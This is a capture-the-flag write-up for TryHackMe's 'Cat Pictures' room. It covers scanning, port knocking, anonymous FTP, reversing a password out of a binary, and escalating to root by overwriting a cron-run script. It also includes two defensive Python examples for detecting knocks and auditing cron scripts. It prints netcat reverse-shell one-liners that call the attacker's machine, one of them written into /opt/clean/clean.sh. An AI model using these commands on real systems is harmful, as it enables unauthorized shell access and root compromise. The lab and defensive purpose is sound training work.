Cat Pictures — TryHackMe
I made a forum where you can post cute cat pictures!

This is a write-up for TryHackMe’s room named Cat Pictures. First we needed to find the port where the web server is running; browsing it gave us a hint to perform port knocking. Then we needed to do a bit of binary reversing, and finally a nice privesc from a Docker environment.
Let’s start with finding out what all services are running:
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.90.64
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
2375/tcp filtered docker
4420/tcp open nvm-express
8080/tcp open http-proxy
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,2375,4420,8080 10.10.90.64
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
2375/tcp filtered docker
4420/tcp open nvm-express?
| fingerprint-strings:
| DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
| Please enter password:
| Invalid password...
| Connection Closed
| NULL, RPCCheck:
| INTERNAL SHELL SERVICE
| please note: cd commands do not work at the moment, the developers are fixing it at the moment.
| ctrl-c
|_ Please enter password:
8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
Note that the FTP port is filtered.
Web Server
Check out the web server running on port 8080. Browsing around, we found a user comment at http://10.10.84.51:8080/viewtopic.php?f=2&t=2 which talks about knocking:

It looks as if we have been told to knock on the server using the given sequence.
Port Knocking
Read about port knocking here, then use the knock program and run:
knock 10.10.84.51 1111 2222 3333 4444
Run this command a few times, then run the NMAP scan again to see if there is any difference in the port scan results:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
2375/tcp filtered docker
4420/tcp open nvm-express
8080/tcp open http-proxy
Now the FTP port is in the OPEN state.
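From the defender's side, the same knock sequence is what a log monitor would look for. The following Python is an added example, not part of the original write-up: it scans firewall log lines and reports any source that hits 1111, 2222, 3333, 4444 in order within a time window. The iptables-style log format, the 10-second window and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The knock sequence from the forum hint in this room
KNOCK_SEQUENCE = (1111, 2222, 3333, 4444)

# Assumed iptables-LOG-style line: ISO timestamp first, then SRC= and DPT= fields
LOG_RE = re.compile(r"^(?P<ts>\S+) .*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)")

def detect_knocks(lines, sequence=KNOCK_SEQUENCE, window_seconds=10):
    """Return {src_ip: [timestamps]} for every source that hit the knock ports in
    order within window_seconds. A wrong port or an expired window resets progress."""
    window = timedelta(seconds=window_seconds)
    progress = defaultdict(lambda: (0, None))  # src -> (next index, first-hit time)
    completed = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a firewall log line
        ts, src, dpt = datetime.fromisoformat(m["ts"]), m["src"], int(m["dpt"])
        idx, start = progress[src]
        if start is not None and ts - start > window:
            idx, start = 0, None  # too slow: start over
        if dpt == sequence[idx]:
            start = start or ts
            idx += 1
            if idx == len(sequence):
                completed[src].append(ts)
                idx, start = 0, None
        elif dpt == sequence[0]:
            idx, start = 1, ts  # out of order, but this hit begins a fresh attempt
        else:
            idx, start = 0, None
        progress[src] = (idx, start)
    return dict(completed)

# Constructed sample log: one host knocks correctly, another hits ports out of order
SAMPLE_LOG = """\
2021-05-01T00:10:01 kernel: IN=eth0 SRC=10.8.98.192 DST=10.10.84.51 PROTO=TCP DPT=1111 SYN
2021-05-01T00:10:02 kernel: IN=eth0 SRC=10.8.98.192 DST=10.10.84.51 PROTO=TCP DPT=2222 SYN
2021-05-01T00:10:02 kernel: IN=eth0 SRC=10.8.98.192 DST=10.10.84.51 PROTO=TCP DPT=3333 SYN
2021-05-01T00:10:03 kernel: IN=eth0 SRC=10.8.98.192 DST=10.10.84.51 PROTO=TCP DPT=4444 SYN
2021-05-01T00:10:05 kernel: IN=eth0 SRC=192.0.2.7 DST=10.10.84.51 PROTO=TCP DPT=1111 SYN
2021-05-01T00:10:06 kernel: IN=eth0 SRC=192.0.2.7 DST=10.10.84.51 PROTO=TCP DPT=3333 SYN
2021-05-01T00:10:07 kernel: IN=eth0 SRC=192.0.2.7 DST=10.10.84.51 PROTO=TCP DPT=4444 SYN
""".splitlines()
```

Calling `detect_knocks(SAMPLE_LOG)` reports only 10.8.98.192, since 192.0.2.7 skipped port 2222 and its attempt was reset.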
FTP
Connect to the FTP server using the anonymous user:
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.84.51
Connected to 10.10.84.51.
220 (vsFTPd 3.0.3)
Name (10.10.84.51:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (676.0817 kB/s)
ftp> quit
221 Goodbye.
note.txt gives us a hint:

SHELL
Connect to port 4420 using netcat:

It looks like a very limited shell. After poking around, we used this one-liner to get a better shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 9999 >/tmp/f
and captured the reverse shell:

In the /home/catlover directory we found an executable, runme. Running this executable asks for a password:

Copy this executable over to our Kali machine using netcat to analyse it further:
Receiving side:
nc -l -p 8888 > runme
Sending side:
nc 10.8.98.192 8888 < runme
Running strings on this executable, we can see a potential password:

Now run the executable and use this password:

User Flag
We got an SSH private key. Copy this key, change its permissions to 600, and try to connect to the server as user catlover:
ssh -i id_rsa catlover@10.10.84.51

We got our first flag at /root/flag.txt

Root Flag
It looks like we are in a Docker environment. Let’s run LinPEAS to find out how we can escalate our privileges. We can see that a strange directory shows up in the scan:

Investigating the /opt/clean directory further shows a script:
root@7546fa2336d6:/# ls -lrt /opt/clean/
total 4
-rw-r--r-- 1 root root 27 May 1 00:20 clean.sh
root@7546fa2336d6:/#
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash
rm -rf /tmp/*
root@7546fa2336d6:/#
Looks like it is cleaning the /tmp directory. Maybe /opt/clean/clean.sh is running as a cron job. To test this, we will add another reverse shell to /opt/clean/clean.sh and try to capture it at our end:
root@7546fa2336d6:/# echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.98.192 7777 >/tmp/f" > /opt/clean/clean.sh
Start an nc listener on Kali and wait for the cron job to run:

Sure enough, we got our shell after some time. The root flag was at /root/root.txt.
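The weakness this step relies on is a script that cron runs with root's privilege but that someone other than root can edit or replace. As an added defensive check, not from the original write-up, the following Python pulls the script path out of a crontab line and audits the script and its parent directory for exactly that. The crontab line and the files the demo builds are constructed; the box's real crontab is not shown in the write-up.

```python
import os
import re
import stat
import tempfile

def script_from_cron_line(line):
    """First absolute path in a crontab line's command, or None.
    Handles '@daily cmd' and 'm h dom mon dow [user] cmd' forms."""
    fields = line.split("#", 1)[0].split()
    if not fields:
        return None
    cmd = fields[1:] if fields[0].startswith("@") else fields[5:]
    paths = re.findall(r"(?<!\S)(/\S+)", " ".join(cmd))
    return paths[0] if paths else None

def audit_script(path, owner_uid=0):
    """Findings for a cron-run script: anyone other than owner_uid (root by
    default) who can edit or replace it gets code execution at cron's privilege."""
    findings = []
    st = os.stat(path)
    if st.st_uid != owner_uid:
        findings.append("script not owned by expected user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("script writable by group/other")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit")
    return findings

def demo():
    """Build three constructed clean.sh layouts in a temp dir and audit each."""
    base = tempfile.mkdtemp()
    cases = {  # name -> (directory mode, script mode)
        "safe": (0o755, 0o644),
        "world_writable_script": (0o755, 0o666),
        "open_directory": (0o777, 0o644),
    }
    results = {}
    for name, (dmode, smode) in cases.items():
        d = os.path.join(base, name)
        os.mkdir(d)
        script = os.path.join(d, "clean.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\nrm -rf /tmp/*\n")
        os.chmod(script, smode)
        os.chmod(d, dmode)
        # Constructed crontab line; the room's real crontab is not shown
        cron_line = f"*/5 * * * * root {script}"
        results[name] = audit_script(script_from_cron_line(cron_line), owner_uid=os.getuid())
    return results
```

`demo()` returns no findings for the safe layout and one finding each for the writable script and the open directory.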
This was a nice and easy room. Hope you enjoyed the write-up. Thanks for reading.